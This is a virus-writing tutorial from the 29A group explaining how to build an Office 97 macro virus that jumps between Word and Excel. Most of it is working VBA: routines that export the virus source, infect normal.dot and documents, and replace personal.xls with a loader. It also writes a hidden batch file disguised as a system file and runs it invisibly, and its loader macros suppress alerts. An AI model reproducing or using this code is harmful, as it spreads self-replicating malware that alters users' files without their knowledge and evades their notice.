Cross Infection Tutorial for Office'97 PART I ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> Reptile/29A Intro ÄÄÄÄÄ When I started working on Office Cross Infections I had no idea how to jump from Word to Excel and vice versa. So I first began to research a bit on the OLE2 format but realized that it's very complex :P and can't be done in VBA (Visual Basic for Applications - all office'97 programs are using this). Then I tried to manage it with OLE Automation, but anyways this didn't work coz you have to import sum libs manually. After more researching I found sum info on DDE (Dynamic Data-Exchange). With DDE you can send data from one application to an other. I managed it to import code from word into excel using DDE and the SendKeys command. But this was way too suspicious becoz the user could see it very well. (VicodinES, Alt-F11 and me are shari- ng macro ideas/code since the beginning of the word/excel infecting idea... so all the cross infectors known till now could be seen as the success of our teamwork. Now Alt-F11 finally managed to write a less suspicious DDE macro virus by using DDE entries, gewd work man! ;) Becoz of time pressure (mgl also wanted to be first :) I was switching from the DDE stuff to an idea I had while lying stoned to death in my bed after reading about the kewl import/export method - thanx again vic! The virus exports it's source to the harddisk and then dr0ps a global template (normal.dot for word and personal.xls for excel) that works as loader and imports the virus source again in the other application. DDE vs. Strange Days method ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ To build your own opinion I'd recommend to first take a l00k at the strange days source (dr0pping a global template) and the shiver source (DDE) which are included in this issue. Well, the main disadvantage of the strange days way is that the virus be- comes extremely huge. The problem that it needs debug.exe to spread isn't a real problem at all coz everyone (even NT users) got it anyways. On the other side the sucking thingy on DDE is that you have to start the other application before opening a channel and then you need to use the SendKeys command to force word to import the virus. At this moment word popps up of it's minimized state for a short moment and is noticeable/sus- picious. Anyways don't forget to read more about DDE in the part II of the cross infection tuto (DDE could also be interesting for other viruses)! Basic Concept ÄÄÄÄÄÄÄÄÄÄÄÄÄ Here I'll try to give an overview how an infected doc file gets processed and jumps to excel (excel to word works the same way - just vice versa) Word: * c:\ * Excel: * * * ÚÄÄÄÄÄÄÄÄÄ¿ * 1.) export virus * ³ Lo.sys: ³ 4.) The next time excel is ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+³ virus ÆÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» started per- ³ source to c:\ * ³ source ³ * º sonal.xls ³ * ÀÄÄÄÄÄÄÄÄÄÙ * + will import ÚÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄ¿ 3.) drop the loader ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ INFECTED DOC FILE: ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ+³ uninfected Personal.xls: ³ ³ virus source + loader ³ * * ³ loader ³ ÀÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÙ * * ÀÄÄÄÄÄÄÄÄÄÄÄÄÒÄÄÄÄÄÄÄÄÄÄÄÄÄÙ 2.) infect ³ normal.dot * * º Lo.sys! + * * + ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ * * ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Infected normal.dot: ³ * * ³ *Infected* personal.xls: ³ ³ virus source + loader ³ * * ³ virus source + loader ³ ÀÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÙ * * ÀÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÙ infect more³ doc files * * + ³ * * here the whole tale begins + * * again.. Detailed Information ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In this section the theory will get practised and the important stuff is explained step by step (word to excel only coz excel to word is the same thing again, just vice versa). First you have to export the virus source code, so the loader will be l8r able to import it to excel. Application.VBE.ActiveVBProject.VBComponents("StrangeDays").Export "c:\lo .sys" Ok, now you have to check if you are in word or excel. This can simply be done this way coz in excel there will never be an active document. If ActiveDocument = "" Then GoTo teonanacatl Then check if normal.dot and the active document are infected. For i = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then r = True Next i For i = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(i).Name = "StrangeDays" Then e = True Next i If they're still clean you should infect them by using the standard import/ export infection technique to avoid the sr-2 protection. If e = False Then With ActiveDocument.VBProject With .VBComponents.Import("c:\lo.sys") End With End With ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFo rmatDocument End If If r = False Then With NormalTemplate.VBProject With .VBComponents.Import("c:\lo.sys") End With End With End If Now you have to check if excel already is infected. This can be done in various ways, for example marking it in a file (like here) or in the registry. a = GetPrivateProfileStringA("29A", "Magic", "", b, 255, "c:\lo.idx") If b = "666" Then GoTo godsucks After you're sure that excel is not infected yet, you must use api calls to access the registry and get the full path of excel. u = RegQueryValueExA(k, "Path", 0, REG_SZ, ByVal v$, s) u = RegCloseKey(k) For e = 1 To Len(v$) If Mid$(v$, e, 1) = Chr$(0) Then GoTo lizard h$ = h$ + Mid$(v$, e, 1) Next e lizard: Ok, now you got the path of the original personal.xls which you have to delete and replace it with the corrupted one that imports the virus source. p = h$ + "\xlstart\personal.xls" DeleteFileA (p) Open "c:\a.scr" For Output As 1 Print #1, "N PERSONAL.XLS" Print #1, "E 0100 D0 CF 11 E0 A1 B1 1A E1 00 00 00 00 00 00 00 00" Print #1, "E 0110 00 00 00 00 00 00 00 [...] Close 1 This is how the code of the personal.xls-loader looks: =========================================================================== Module name: syaDegnartS (Macro) --------------------------------------------------------------------------- Attribute VB_Name = "syaDegnartS" Sub Auto_Close() On Error GoTo argh Application.DisplayAlerts = False Application.EnableCancelKey = xlDisabled For i = 1 To Workbooks("personal.xls").VBProject.VBComponents.Count If Workbooks("personal.xls").VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo argh Next i With Workbooks("personal.xls").VBProject With .VBComponents.Import("c:\lo.sys") End With End With Workbooks("personal.xls").Save argh: End Sub =========================================================================== The code of the normal.dot-loader l00ks a bit diffrent but does the same: =========================================================================== Module name: syaDegnartS (Macro) --------------------------------------------------------------------------- Attribute VB_Name = "syaDegnartS" Sub AutoExec() On Error GoTo argh Application.DisplayAlerts = False Application.EnableCancelKey = wdDisabled For i = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(i).Name = "StrangeDays" Then GoTo argh Next i With NormalTemplate.VBProject With .VBComponents.Import("c:\lo.sys") End With End With NormalTemplate.Save argh: End Sub =========================================================================== Then you have to build a batch file that converts the debug script of normal.dot and copies it to the word template path and deletes all the other files, that you don't need anymore. Open "c:\start.bat" For Output As 1 Print #1, "REM This is a system file. Do not edit or remove!" Print #1, "@echo off" Print #1, "c:" Print #1, "cd\" Print #1, "dir" Print #1, "debug < a.scr > nul" Print #1, "copy personal.xls " + p Print #1, "del a.scr" Print #1, "del personal.xls" Close 1 Shell "c:\start.bat", vbHide To finish the whole process mark excel as infected. c = WritePrivateProfileStringA("29A", "Magic", "666", "c:\lo.idx") Diffrent AutoMacros ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ In word and excel the automacros are diffrent so don't forget to add an excel automacro that references to the word automacro else it won't be run. For example this macro (and with it the virus code) is executed automatic- ally by word every time a file gets closed. Sub AutoClose() (virus code) End Sub While this macro is launched by excel every time a file gets opened. It then just calls the macro above (containing the virus code). Sub Auto_Open() Application.OnSheetActivate = "StrangeDays.AutoClose" End Sub Cross Infector Info ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Cross: http://www.avp.ch/avpve/macro/xmulti/cross.stm Strange Days: http://www.avp.ch/avpve/macro/xmulti/teocatl.stm Shiver: http://www.avp.ch/avpve/macro/xmulti/SHIVER.stm Well I guess this is enough information for writing an own cross infex0r if I didn't forget too much details in my speedy rush.. see yah in hell, -Reptile/29A-